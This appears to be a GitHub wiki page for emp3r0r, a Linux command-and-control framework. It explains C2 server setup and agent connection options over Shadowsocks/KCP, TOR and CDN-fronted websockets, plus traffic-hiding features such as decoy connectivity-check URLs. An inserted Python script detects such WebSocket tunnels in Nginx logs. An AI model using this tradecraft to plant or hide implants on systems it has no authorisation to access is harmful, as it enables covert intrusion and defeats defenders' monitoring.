Jing Mi edited this page Apr 11, 2022 · 47 revisions

CC (Command and Control)

This program includes a terminal UI that lets you navigate emp3r0r's features and control your targets (agents).

Currently, emp3r0r supports:

  • Direct agent to CC connection using HTTP2
  • Connection through Shadowsocks with optional KCP (convert TCP to UDP) support
  • Connection through CDN using Websocket, no external program needed
  • Connection through TOR via external TOR proxy
  • Connection through upstream proxy server (HTTP, SOCKS, etc.)

Currently only x86_64 Linux is supported.

Configure C2 server and start C2 UI

Download the latest release from https://github.com/jm33-m0/emp3r0r/releases; emp3r0r-vX.X.X.tar.xz is the file you want.

Extract all files and run ./emp3r0r --install to install emp3r0r to your system. By default it installs to /usr/local/lib/emp3r0r, while the launcher ./emp3r0r itself is copied to /usr/local/bin; in other words, the PREFIX variable is set to /usr/local.

If you wish to install emp3r0r to a different location, run PREFIX=/usr ./emp3r0r --install, substituting /usr with the directory you want to use. Typically, when installing as user-managed software, you should use /usr/local to make it easier to maintain. If you install emp3r0r from a deb package or something similar, it will install to /usr.

After a successful installation, you should be able to execute emp3r0r from your current shell; the C2 UI will show if you have tmux installed.

On the first run, the emp3r0r launcher script will generate the CA and C2 server certificates. You will need to input the desired C2 server names, which agents use to identify the server. If you plan to use your C2 server with more than one IP or domain, input them separated by spaces, like example.com 192.168.0.1 TOROnionSiteName.onion

If you intend to make the server certificate valid for multiple domains/IPs (for example, a TOR domain and a normal domain), you can do that by adding multiple C2 addresses when prompted.

Direct connection (HTTP2 via TLS)

There's nothing to configure. Once C2 is started, type gen_agent to generate an agent binary and follow the on-screen instructions.

Shadowsocks (Obfuscated TCP)

Shadowsocks is well known to users living under heavily censored Internet (China, Iran, etc.). It erases everything that could be used as an identifier of its traffic; in other words, it tries to defeat DPI. When you enable Shadowsocks in your emp3r0r agent, the C2 traffic appears as encrypted TCP traffic with no recognizable structure, which makes it hard for traffic monitoring systems to find.

KCP exists to optimize your connection quality, as it says on its homepage:

Millions of devices (from low-end MIPS routers to high-end servers) have deployed kcp-go powered program in a variety of forms like online games, live broadcasting, file synchronization and network acceleration.

Seems quite useful for C2s as well, doesn't it?

KCP converts C2 traffic to UDP and encrypts/obfuscates it just like Shadowsocks does. When UDP is not restricted in your target network, KCP can dramatically improve the C2 connection quality and, as a bonus, is stateless (a key feature of UDP).

KCP can be optionally enabled when you enable Shadowsocks.

emp3r0r will generate randomized Shadowsocks configs for you automatically.

TOR

To use TOR, you have to set up a hidden service first.

Note: a TOR hidden service doesn't need a public IP address to work; you can run your service from anywhere.

Assuming your hidden service is configured as:

# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 443 127.0.0.1:8000

TOR domain name:

❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onion

When generating C2 server certificate, make sure you include the onion address.

To generate an agent that uses the onion address as C2, type gen_agent and set C2 address accordingly.

CDN

First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.

I assume you already know how to configure a CDN for your website. Here we put our CC server behind Nginx:

       HTTP2           websocket in TLS        websocket          websocket                       HTTP2
agent -------> socks5 ------------------> CDN -----------> Nginx ----------> CC websocket server -------> CC

Nginx config:

# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
    proxy_pass http://127.0.0.1:9000/ws;
    proxy_redirect off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;

    # Pass the client address upstream. Note: when Nginx sits behind a CDN,
    # $remote_addr is the CDN edge, not the agent, unless the realip module is configured
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

Likewise, make sure the C2 address is set when generating certificates and when using gen_agent.

To run CC server with CDN support enabled:

emp3r0r -cdn2proxy 9000 # 9000 is the listening port of websocket server
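The CDN chain above terminates in an Nginx location that upgrades to WebSocket, and Nginx logs each completed upgrade as status 101. As an added, defender-side example (not emp3r0r code), the following script parses constructed lines in Nginx's default combined log format and surfaces repeated WebSocket handshakes per client and path; the /emp3r0r path is taken from the wiki's location block.

```python
"""Flag WebSocket handshakes in Nginx access logs (defender-side check).

Added example, not emp3r0r code. Assumes Nginx's default "combined" log
format; the /emp3r0r path mirrors the wiki's location block and the log
lines are constructed.
"""
import re
from collections import Counter

# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.10 - - [11/Apr/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Apr/2022:10:00:05 +0000] "GET /emp3r0r HTTP/1.1" 101 0 "-" "Go-http-client/1.1"
198.51.100.7 - - [11/Apr/2022:10:05:05 +0000] "GET /emp3r0r HTTP/1.1" 101 0 "-" "Go-http-client/1.1"
203.0.113.10 - - [11/Apr/2022:10:06:00 +0000] "GET /emp3r0r HTTP/1.1" 404 153 "-" "curl/7.81.0"
this line is garbage and must be skipped
"""

def parse_line(line):
    """Parse one combined-format line; None for lines that do not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None

def find_websocket_handshakes(log_text):
    """Return entries answered with 101 Switching Protocols.

    Nginx logs a completed Upgrade as status 101, so a long-lived tunnel
    (as used for CDN-fronted C2) shows up as repeated 101s from one client
    on one path, typically with a non-browser User-Agent. Behind a CDN the
    logged ip is the CDN edge, not the real client, unless realip is set up.
    """
    return [e for e in (parse_line(ln) for ln in log_text.splitlines())
            if e and e["status"] == "101"]

def summarize(hits):
    """Count handshakes per (client, path) to surface beaconing-style repeats."""
    return Counter((h["ip"], h["path"]) for h in hits)

if __name__ == "__main__":
    for (ip, path), n in summarize(find_websocket_handshakes(SAMPLE_LOG)).items():
        print(f"{ip} upgraded {path} to WebSocket {n} time(s)")
```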

Agent (runs on your targets)

Generate agents

Generate an agent binary for a target

In emp3r0r's console, type gen_agent to build agent binaries and follow the on-screen instructions.

Run the generated agent binary (under ~/.emp3r0r) on target host.

Upgrade agent on a target

When the target is connected, type upgrade_agent; the target will reconnect with the new version.

Configurable options

CC Indicator

This is a URL that works like Windows's NCSI connectivity check; it is designed to hide the actual C2 traffic.

You can configure this URL to some legit site such as https://github.com/jm33-m0/emp3r0r, or some other sites that are considered legit in your target network.

When this option is enabled, agents request the pre-configured URL and expect to find a certain text pattern in the server's response. If it is found, agents continue to connect to the actual C2 server; if not, agents sleep for a pre-configured time span and repeat the process.

Agent proxy

You can specify (hardcode) a proxy address in your agent binary when using gen_agent.

If you didn't do that, use ./agent -proxy 'socks5://ip:port' instead.

Auto proxy

Uses UDP broadcasting to communicate with other agents and form a proxy chain to gain Internet access.

This can be disabled if you don't want the agent to send noisy UDP traffic (you can also adjust the time interval via broadcast_interval_min and broadcast_interval_max).

Reverse proxy

This is not a build-time option, but since I have mentioned auto proxy, I will explain this as well.

This works like ssh -R: one connected agent initiates a connection towards another agent (one that cannot send outbound traffic) and uses that connection to provide a SOCKS5 proxy for the target agent so it can reach C2.

DoH server

Uses DNS over HTTPS in the agent to secure its DNS requests. You can opt out if this is not a concern or DoH is unavailable.

Direct connection

To run the agent with a direct connection to the CC server, just run ./agent. If you want more control:

❯ ./agent -h
Usage of ./agent:
  -cdnproxy string
        CDN proxy for emp3r0r agent's C2 communication
  -daemon
        Daemonize
  -doh string
        DNS over HTTPS server for CDN proxy's DNS requests
  -proxy string
        Proxy for emp3r0r agent's C2 communication
  -silent
        Suppress output

I recommend hardcoding these variables when using gen_agent.

TOR

Likewise, build the agent with the onion domain name as the CC host.

To run the agent, you have to run a TOR proxy first; I have a static tor binary for you.

On your target, run ./agent; it will automatically use the TOR proxy (socks5://127.0.0.1:9050).

If you want to use a different TOR proxy, type ./agent -proxy 'socks5://addr:port'

I recommend hardcoding the proxy address when using gen_agent.

CDN

Same build process, but use your domain name as the CC address:

./agent -cdnproxy "wss://example.com/emp3r0r"

I recommend hardcoding the proxy address when using gen_agent.